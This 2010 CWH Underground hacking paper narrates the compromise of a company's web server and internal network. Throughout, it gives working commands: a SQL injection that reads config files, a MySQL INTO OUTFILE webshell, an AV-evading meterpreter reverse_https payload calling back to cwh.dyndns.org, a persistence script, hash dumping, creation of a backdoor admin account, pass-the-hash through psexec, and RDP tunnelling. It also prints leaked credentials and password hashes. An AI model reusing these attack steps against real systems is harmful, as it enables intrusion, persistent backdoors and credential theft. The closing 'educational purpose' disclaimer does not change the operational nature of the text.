|=--------------------------------------------------------------------=|
|=----------------=[ The Operation OutBreak Attack ]=-----------------=|
|=--------------------------=[ 26 Dec 2010 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : The Operation OutBreak Attack
Author : ZeQ3uL (Prathan Phongthiproek)
Retool2 (Suttapong Wara-asawapati)
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Website : www.citecclub.org
Date : 2010-12-26
##########
Contents
##########
[0x00] - Introduction
[0x01] - OutBreak Web Application
[0x02] - OutBreak MySQL Database
[0x03] - OutBreak with Autosploit.rc
[0x04] - Outbreak to Internal Server
[0x05] - References
[0x06] - Greetz To
#######################
[0x00] - Introduction
#######################
Hi all, in this paper, we will show you my hacking method (Logs) from real world case study on some company.
Moreover, we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many exploit and auxiliary (We will see it ;D)
We recommend to read previous paper "The Operation Cloudburst Attack" that guide you about methods to hacking with Metasploit Framework.
###################################
[0x01] - OutBreak Web Application
###################################
First, I use nmap for scan open port on target and found information below
[Nmap Result]-----------------------------------------------------------------------------------
root@bt:~# nmap -sV -PN www.mbank.com
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-12-02 02:13 EST
Nmap scan report for www.mbank.com
Host is up (0.0070s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.0 ((Win32) PHP/5.2.4)
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.95 seconds
[End Result]------------------------------------------------------------------------------------
From result, I can only access 2 ports (HTTP, MySQL). Next step i can guess phpinfo.php file
that contain web server information (We need it for enumerate information to attack with next step)
[Wget Result]-----------------------------------------------------------------------------------
root@bt:~#wget www.mbank.com/phpinfo.php
--2010-12-02 02:19:23-- http://www.mbank.com/phpinfo.php
Connecting to www.mbank.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `phpinfo.php'
[ <=> ] 47,540 --.-K/s in 0.004s
2010-12-02 02:19:23 (10.3 MB/s) - `phpinfo.php' saved [47540]
root@bt:~# more phpinfo.php | grep "DOCUMENT_ROOT"
| DOCUMENT_ROOT | D:/www/htdocs/ |
| _SERVER["DOCUMENT_ROOT"] | D:/www/htdocs |
[End Result]------------------------------------------------------------------------------------
I read file phpinfo.php and knew that web root location is "D:/www/htdocs/" and Now find configuration file (config.php/configuration.php) that keep database information,
In this real case study we found their location is www.mbank.com/include/config.php ,Next discover da entry point for attack web application. Well-known is SQL Injection that still hot and many website still lack of prevention.
I can attack target with this string "www.mbank.com/news.php?id=1 and 1=2 union select 1,2,3,4,5--" Normally we know that we can dump database information from SQL Injection vulnerability
but its hard for nowadays because many database was encrypted information with MD5 or SALT+MD5 that harder for attacker to crack it (Waste of Time). I change from dump information to view configuration file (That's better !!) with MySQL Load_file function.
From phpinfo.php, We knew root directory path -> D:/www/htdocs/
From Configuration file, We knew that locate on -> www.mbank.com/include/config.php (D:/www/htdocs/include/config.php)
I encode D:/www/htdocs/include/config.php to HEX -> 0x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870
Then mapping with SQL Injection techniques -> http://www.mbank.com/news.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file%280x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870%29,3,4,5--
and look at source code with view source, I found database information like this;
[View Source]-----------------------------------------------------------------------------------
........
.......
[End Result]------------------------------------------------------------------------------------
Now we got username and password for MySQL Database => root/1qaz2wsx!@#$
##################################
[0x02] - OutBreak MySQL Database
##################################
I try to connect to MySQL/3306 with mysql client and it's work (By default, root account cannot connect to this port except from localhost).
If u cannot directly connect to MySQL/3306, U can find database path (/phpMyadmin or /phpmyadmin) for optional.
[MySQL Log]-----------------------------------------------------------------------------------
root@bt:~# mysql -u root -p1qaz2wsx!@#$ -h www.mbank.com -P 3306
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 83
Server version: 5.0.24a-community-nt MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mbank |
| mysql |
| smf |
+--------------------+
4 rows in set (0.00 sec)
mysql> use mbank;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL);
Query OK, 0 rows affected (0.07 sec)
mysql> INSERT INTO GETSHELL VALUES ('');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM GETSHELL into outfile 'D:\\www\\htdocs\\upload.php';
Query OK, 1 row affected (0.00 sec)
[End Result]------------------------------------------------------------------------------------
Now i can access www.mbank.com/upload.php for upload PHP shell (C99,R57,Etc) but many webserver installed antivirus so i encode phpshell with base64 for FUD. For example (Incop's Shell bypass AV)
[Incop Shell]-----------------------------------------------------------------------------------
[End Result]------------------------------------------------------------------------------------
Save it as incop.php. When i upload this file, It change to shell.php (Depended on upload.php file that i created from mysql client) Now i have php backdoor (shell.php) in target website
Now move to metasploit, I created exe payload from msfpayload to connect back to my server.
./msfpayload windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443 X > rev.exe
We got rev.exe file that 100% SSL-encrypted. I tested, it can bypass these AV
- Avast / Avast5
- AVG
- ClamAV
- eSafe
- Fortinet
- Kaspersky
- McAfee / McAfee-GW-Edition
- Nod32
- Symantec
- TrendMicro
- ETc
Upload rev.exe to www.mbank.com with shell.php.
######################################
[0x03] - OutBreak with Autosploit.rc
######################################
Next step, I use metasploit console waiting for connect back. I wrote autosploit.rc script for metasploit
[autosploit.rc]-----------------------------------------------------------------------------------
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 443
set LHOST cwh.dyndns.org
set ExitOnSession false
exploit -j
sleep(1)
print_status("Waiting on an incoming sessions...")
while (true)
framework.sessions.each_pair do |sid,s|
thost = s.tunnel_peer.split(":")[0]
if s.ext.aliases['stdapi']
sleep(1)
print_status("Migrating to Explorer...")
s.console.run_single("run migrate explorer.exe")
print_status("Persistence to session #{sid} #{thost}...")
s.console.run_single("run persistence -U -i 10 -p 443 -r cwh.dyndns.org")
sleep(1)
print_status("Closing session #{sid} #{thost}...")
else
print_status("Session #{sid} #{thost} active, but not yet configured")
end
end
sleep(1)
end
print_status("All done")
[End Result]------------------------------------------------------------------------------------
Run this script with "msfconsole -r autosploit.rc" on my server (CWH.dyndns.org)
[MSF Log]-----------------------------------------------------------------------------------
root@bt:~# msfconsole -r autosploit.rc
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 638 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11405 updated today (2010.12.13)
resource (autosploit.rc)> use exploit/multi/handler
resource (autosploit.rc)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (autosploit.rc)> set LPORT 443
LPORT => 443
resource (autosploit.rc)> set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
resource (autosploit.rc)> set ExitOnSession false
ExitOnSession => false
resource (autosploit.rc)> exploit -j
[*] Exploit running as background job.
[*] resource (autosploit.rc)> Ruby Code (599 bytes)
[*] Started reverse handler on cwh.dyndns.org:443
[*] Server started.
[*] Waiting on an incoming sessions...
[End Result]------------------------------------------------------------------------------------
Next Step,we back to shell.php and run rev.exe for connect back to cwh.dyndns.org. My server will have log like this
[MSF Log]-----------------------------------------------------------------------------------
[*] Sending stage (749056 bytes) to 202.57.123.61
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 202.57.123.61:1150) at Mon Dec 13 06:26:02 -0500 2010
[*] Session 1 202.57.123.61 active, but not yet configured
[*] Current server process: rev.exe (2312)
[*] Spawning a explorer.exe host process
[*] Migrating into process ID 3240
[*] New server process: explorer.exe (3240)
[*] Persistence to session 1 202.57.123.61...
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf3/logs/scripts/persistence/MBank-9V0YIKHGUQ_20101213.2605/MBank-9V0YIKHGUQ_20101213.2605.rc
[*] Creating Payload=windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443
[*] Persistent agent script is 612403 bytes long
[+] Persisten Script written to C:\DOCUME~1\ADMINI~1.BAN\LOCALS~1\Temp\PXPAoEDWXHCQm.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1.BAN\LOCALS~1\Temp\PXPAoEDWXHCQm.vbs
[+] Agent executed with PID 2172
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\pwDRjMUermyWOM
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\pwDRjMUermyWOM
[End Result]------------------------------------------------------------------------------------
My autosploit script finished for upload backdoor to server with persistence techniques (Mbank will reverse connect to cwh.dyndns.org every 10 seconds) WooT WooT !!.
######################################
[0x04] - Outbreak to Internal Server
######################################
I enumerate information from target for attack internal server, First I use nmap for scan windows machine on subnet then use hashdump to dump SAM file and use psexec for try to connect server
that use the same username/password (adminit) and BINGO !! i can "Pass the Hash" on target 202.57.123.65 that use adminit:1009:4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468:::
[Nmap]-----------------------------------------------------------------------------------
msf exploit(handler) > nmap -v -sP 202.57.123.1/24 -p 139,445
Starting Nmap 5.21 ( http://nmap.org ) at 2010-12-13 00:09 ICT
Initiating ARP Ping Scan at 00:09
Scanning 103 hosts [1 port/host]
Completed ARP Ping Scan at 00:09, 1.28s elapsed (103 total hosts)
Initiating Parallel DNS resolution of 103 hosts. at 00:09
Completed Parallel DNS resolution of 103 hosts. at 00:09, 0.02s elapsed
ÉÉ
Completed SYN Stealth Scan at 00:09, 0.01s elapsed (6 total ports)
Nmap scan report for 202.57.123.62
Host is up (0.0045s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:1D:7E:AE:44:A6
Nmap scan report for 202.57.123.65
Host is up (0.0044s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
É
[End Result]------------------------------------------------------------------------------------
[Pass the Hash]-----------------------------------------------------------------------------------
msf exploit(handler) >sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
adminit:1009:4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468:::
ASPNET:1007:a29f3377e4a58eb1107fc8633cfe562c:c6a7c566af537b816f001d0fea95199f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_MBANK-9V0YIKHGUQ:1004:3454d175ec02f1a94da8ede9bacc6fbb:1c297be0bfc17b7285746dc763fa834a:::
IWAM_MBANK-9V0YIKHGUQ:1006:70246d502a449bb1e9139ddc3f21bf91:41852ceb10626856344e782c3bcbfc5b:::
SUPPORT_388945a0rs:1001:aad3b435b51404eeaad3b435b51404ee:35dbf71c3861f3f6338ae1b54ac20a70:::
meterpreter > shell
Process 2564 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
D:\www\htdocs>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.
D:\www\htdocs>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
D:\www\htdocs>exit
meterpreter >
Background session 1? [y/N]y
msf exploit(handler) >use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 202.57.123.65
RHOST => 202.57.123.65
msf exploit(psexec) > set SMBUser adminit
SMBUser => adminit
msf exploit(psexec) > set SMBPass 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468
SMBPass => 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server Authenticating as user 'adminit'
[*] Uploading payload
[*] Created \wRAGxeKp.exe
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[\svcctl] ...
[*] Obtaining a service manager handle
[*] Creating a new service (bbULKlnn - "Mn0aWrz")
[*] Closing service handle
[*] Opening service
[*] Starting the service
[*] Removing the service
[*] Closing service handle
[*] Deleting \wRAGxeKp.exe
[*] Sending stage (748032 bytes) to 202.57.123.65
[*] Meterpreter session 2 opened (202.57.123.61:55640 -> 202.57.123.65:4444) at Mon Dec 13 07:10:32 -0500 2010
meterpreter >
[End Result]------------------------------------------------------------------------------------
From above, It's hard to control system coz I can control only from msfconsole or phpshell.
So I go to phpshell and type command "netstat -an" for view open port on www.mbank.com. i found this server opened Remote Desktop/3389. I moved to msfconsole on my cwh.dyndns.org and use portforward tunneling.
meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
Next, I can use rdesktop to connect to www.mbank.com server with this command.
root@bt:~#rdesktop -u cwh -p 1234 localhost
Now we can fully compromised www.mbank.com with remote desktop and can use this machine to remote desktop to internal server (202.57.123.65, etc)
Enjoy !! and Merry X' Mas
#####################
[0x05] - References
#####################
[1] http://blog.metasploit.com/
[2] Metasploit Unleashed
####################
[0x06] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx : asylu3, citecclub.org, exploit-db.com
----------------------------------------------------
This paper is written for Educational purpose only. The authors are not responsible for any damage
originating from using this paper in wrong objective. If you want to use this knowledge with other person systems,
you must request for consent from system owner before
----------------------------------------------------